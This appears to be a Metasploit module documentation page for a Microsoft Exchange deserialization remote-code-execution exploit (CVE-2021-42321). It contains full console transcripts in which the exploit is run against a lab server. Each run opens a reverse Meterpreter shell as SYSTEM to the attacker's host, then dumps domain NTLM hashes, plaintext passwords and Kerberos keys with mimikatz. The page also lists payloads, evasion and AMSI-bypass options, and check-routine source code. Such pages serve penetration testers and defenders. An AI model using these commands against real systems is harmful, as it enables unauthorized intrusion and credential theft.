[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Redirecting stageless connection from /LLPgD_mj7kz9ZPxmn24Q9Qv80ANZ8PU38jaMQ3JCPiwWGPz3Gm6fNlGNzXZ9e_8y5xxnpC6a-JVHNcPmhyMpFnMCwvLNQeZRvnB9 with UA 'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Attaching orphaned/stageless session...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:02:25 -0600
[*] Server stopped.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN 373b765d01cd8aefe 220cface685ef2b97 c5c54fb2b86a1a4a85
a318e3843980454 a998f965b0d9b996b e6b23ad360777e
55d560
DC1$ TESTINGDOMAIN bc7047881521a2844 1489def7ac6e5dd8e
573cd9b08cb33ed ebf9d421549375da8
9bef2d
HealthMailbox25a TESTINGDOMAIN c9cd8580d9a519f7d f5a89bd625da37ca3 c0f96c3c13864ffe1f
d078 3fe3b47e4e55f21 e9de89be8bba67e1b 6b62f2d0811bb1
7d509b
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox25ad0782aada405 (null) 5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
eaaa7287c8c514daf@testingdom >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
ain.internal OeVGtzP=qPZ@9xT-uR)niraV42
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN (null)
DC1$ TESTINGDOMAIN (null)
HealthMailbox25ad078 TESTINGDOMAIN (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
DC1$ testingdomain.internal 4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
a 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078 TESTINGDOMAIN.INTERNAL (null)
dc1$ TESTINGDOMAIN.INTERNAL (null)
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.31.160.218 - Meterpreter session 2 closed. Reason: User exit
Target 2 - PowerShell Stager
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.31.160.218 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces
s, none)
LHOST 172.31.171.42 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PowerShell Stager
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7x
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Staging x64 payload (201308 bytes) ...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:03:03 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN 373b765d01cd8aefe 220cface685ef2b97 c5c54fb2b86a1a4a85
a318e3843980454 a998f965b0d9b996b e6b23ad360777e
55d560
DC1$ TESTINGDOMAIN bc7047881521a2844 1489def7ac6e5dd8e
573cd9b08cb33ed ebf9d421549375da8
9bef2d
HealthMailbox25a TESTINGDOMAIN c9cd8580d9a519f7d f5a89bd625da37ca3 c0f96c3c13864ffe1f
d078 3fe3b47e4e55f21 e9de89be8bba67e1b 6b62f2d0811bb1
7d509b
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox25ad0782aada405 (null) 5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
eaaa7287c8c514daf@testingdom >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
ain.internal OeVGtzP=qPZ@9xT-uR)niraV42
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN (null)
DC1$ TESTINGDOMAIN (null)
HealthMailbox25ad078 TESTINGDOMAIN (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
DC1$ testingdomain.internal 4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
a 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078 TESTINGDOMAIN.INTERNAL (null)
dc1$ TESTINGDOMAIN.INTERNAL (null)
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show info
Name: Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE
Module: exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
Platform: Windows
Arch: cmd, x86, x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-12-09
Provided by:
pwnforsp
zcgonvh
Microsoft Threat Intelligence Center
Microsoft Security Response Center
peterjson
testanull
Grant Willcox
Module side effects:
ioc-in-logs
config-changes
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows Command
1 Windows Dropper
2 PowerShell Stager
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword yes The password to use to authenticate to the Exchange server
HttpUsername yes The username to log into the Exchange server as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
t
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mach
ine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Description:
This vulnerability allows remote attackers to execute arbitrary code
on Exchange Server 2019 CU10 prior to Security Update 3, Exchange
Server 2019 CU11 prior to Security Update 2, Exchange Server 2016
CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior
to Security Update 2. Note that authentication is required to
exploit this vulnerability. The specific flaw exists due to the fact
that the deny list for the ChainedSerializationBinder had a typo
whereby an entry was typo'd as System.Security.ClaimsPrincipal
instead of the proper value of
System.Security.Claims.ClaimsPrincipal. By leveraging this
vulnerability, attacks can bypass the ChainedSerializationBinder's
deserialization deny list and execute code as NT AUTHORITY\SYSTEM.
Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-42321
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169
https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
Module Options
This is a complete list of options available in the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword yes The password to use to authenticate to the Exchange server
HttpUsername yes The username to log into the Exchange server as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.170 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
Advanced Options
Here is a complete list of advanced options supported by the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show advanced
Module advanced options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, bourne, debug_a
sm, debug_write, echo, printf, vbs, vbs_adodb, certutil
, tftp, wget, curl, fetch, lwprequest, psh_invokewebreq
uest)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set
to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a pa
yload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is m
issing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable templ
ate
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout 5 no HTTP connection and receive timeout
HttpRawHeaders no Path to ERB-templatized raw headers to append to existi
ng headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset t
o disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
ListenerComm no The specific communication channel to use for this serv
ice
MSI::Custom no Use custom msi instead of automatically generating a pa
yload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if
accepted)
Powershell::encode_final_payloa false yes Encode final payload for -EncodedCommand
d
Powershell::encode_inner_payloa false yes Encode inner payload for -EncodedCommand
d
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old
, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections auto yes Prepend AMSI/SBL bypass (Accepted: auto, true, false)
_bypass
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "A
DH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS an
d SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23
, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (iPad; CPU OS 15_3_ no The User-Agent header to use for all requests
1 like Mac OS X) AppleWebKit/60
5.1.15 (KHTML, like Gecko) Vers
ion/15.2 Mobile/15E148 Safari/6
04.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 10 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go thro
ugh proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/http/exchange_chainedserializationbinder_denylist_typo_rce module can exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Command
1 Windows Dropper
2 PowerShell Stager
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
1 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
2 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
3 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
4 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
5 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
6 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
7 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
8 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
9 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
10 payload/cmd/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
11 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
12 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
13 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
14 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
15 payload/generic/custom normal No Custom Payload
16 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
17 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
18 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none,
gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space
, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: spac
e, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random
, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Range provided is not iterable
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Could not determine the build number of the target Exchange Server.
- Connection failed
- Response obtained but it was empty!
- Response obtained but no FolderId element was found within it!
- Response obtained without expected Id and ChangeKey elements!
- Connection failed
- Response obtained but it was empty!
- Success
- Was not able to successfully delete the existing user configuration on the Inbox folder!
- Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
- Connection failed
- Response obtained but it was empty!
- Success
- Was not able to successfully create the malicious user configuration on the Inbox folder!
- Connection failed
- Response obtained but it was empty!
- Did not recieve the expected internal server error upon deserialization!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
141: 'method' => 'GET',
142: 'uri' => normalize_uri(target_uri.path, '/owa/service')
143: )
144:
145: unless res
146: return CheckCode::Unknown('Target did not respond to check.')
147: end
148:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
147: end
148:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
152: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
153: else
154: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
155: end
156: end
157:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
152: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
153: else
154: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
155: end
156: end
157:
158: # Next, determine if we are up against an older version of Exchange Server where
159: # the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
162: 'method' => 'GET',
163: 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')
164: )
165:
166: unless res
167: return CheckCode::Unknown('Target did not respond to check.')
168: end
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
167: return CheckCode::Unknown('Target did not respond to check.')
168: end
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
173: else
174: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
175: end
176: end
177:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
173: else
174: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
175: end
176: end
177:
178: # Next try @tseller's way and try /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
179: # URL which if successful should provide some XML with entries like the following:
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
188: 'method' => 'GET',
189: 'uri' => normalize_uri(target_uri.path, '/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application')
190: )
191:
192: unless res
193: return CheckCode::Unknown('Target did not respond to check.')
194: end
195:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
194: end
195:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
